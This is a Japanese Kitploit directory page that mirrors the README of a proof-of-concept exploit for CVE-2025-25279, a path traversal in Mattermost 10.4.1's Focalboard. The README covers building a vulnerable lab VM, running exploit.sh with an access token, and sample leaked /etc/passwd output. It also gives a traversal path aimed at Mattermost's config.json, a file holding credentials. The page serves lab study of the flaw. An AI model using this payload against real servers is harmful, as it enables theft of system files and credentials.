Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — CVE-2025-25279の概念実証エクスプロイト。Mattermost Focalboardのパストラバーサルにより、認証済みユーザーが任意のファイルを読み取り、機密ファイルを外部に持ち出すことが可能になります。 | Kitploit
ツール/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

CVE-2025-25279の概念実証エクスプロイト。Mattermost Focalboardのパストラバーサルにより、認証済みユーザーが任意のファイルを読み取り、機密ファイルを外部に持ち出すことが可能になります。

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 Focalboard におけるパストラバーサルによるファイル流出

🌟 概要

この概念実証は、Mattermost 10.4.1 に影響する脆弱性 CVE-2025-25279 の悪用を示します。
Focalboard(ボード管理モジュール)の欠陥により、添付ファイル内のパストラバーサルを介して任意のファイル読み取りが可能になります。

このエクスプロイトにより、以下を流出させることができます:

  • /etc/passwd
  • /etc/group
  • または Mattermost の機密ファイル(例:)
    opt/mattermost/config/config.json

攻撃は、認証されたユーザーアカウントでのみ機能します(脆弱なシナリオの場合)。


🗂️ ディレクトリ構成

  • 📁 target : ターゲットボックス作成用ディレクトリ
  • 📁 live : ターゲット VM の作成およびエクスプロイトデモ用ディレクトリ
  • 📁 src : 補助的なソースコード(必要な場合)
  • 📁 refs : 記事や参考文献を格納するディレクトリ
  • 📁 docs : プロジェクト中に作成された関連ドキュメント(録画を含む)

🔧 前提条件

  • Vagrant
  • VirtualBox
  • プロジェクトファイル一式(target + live)
  • Mattermost アカウント(PAT = パーソナルアクセストークン)
  • Linux/Mac/Windows + Bash

📦 Mattermost のダウンロード

target/ フォルダは含まれていません(GitHub には大きすぎます)。

手動でダウンロード: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

その後、ファイルを target に配置してください。

VM をデプロイする前に

まず target ディレクトリに移動し、以下を実行します:

root@kitploit:~
cd target
make mattermost.box

mattermost-poc ボックスが存在しないと VM が動作しないため、必ず追加してください:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. 脆弱なマシンのデプロイ

VM を起動

root@kitploit:~
cd live/vm1
vagrant up

VM に接続

root@kitploit:~
 vagrant ssh

Web インターフェースでユーザーを作成:

開く:http://localhost:8065

UI(ユーザーインターフェース)でトークンを作成:

プロフィール → セキュリティ → パーソナルアクセストークン

2. エクスプロイトのインストール

ホストマシンから:

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. エクスプロイトの実行

root@kitploit:~
./exploit.sh

以下の入力を求められます:

root@kitploit:~
PAT (Personal Access Token) :

👉 Mattermost ユーザーの有効な PAT を入力してください。

📸 出力例(/etc/passwd の流出)

root@kitploit:~
===== 内容(先頭) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

対象ファイル:config.json

Mattermost の機密ファイルを狙う場合:

exploit.sh スクリプトの上部を編集:

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
エクスプロイトは config.json の内容を表示します。

✒️ 作者

🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril

🎬 デモ動画

👉 完全なデモ動画は以下にあります: live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 注記

この PoC は学習環境専用です。 教育目的以外、または許可なく使用しないでください。

ツールをダウンロード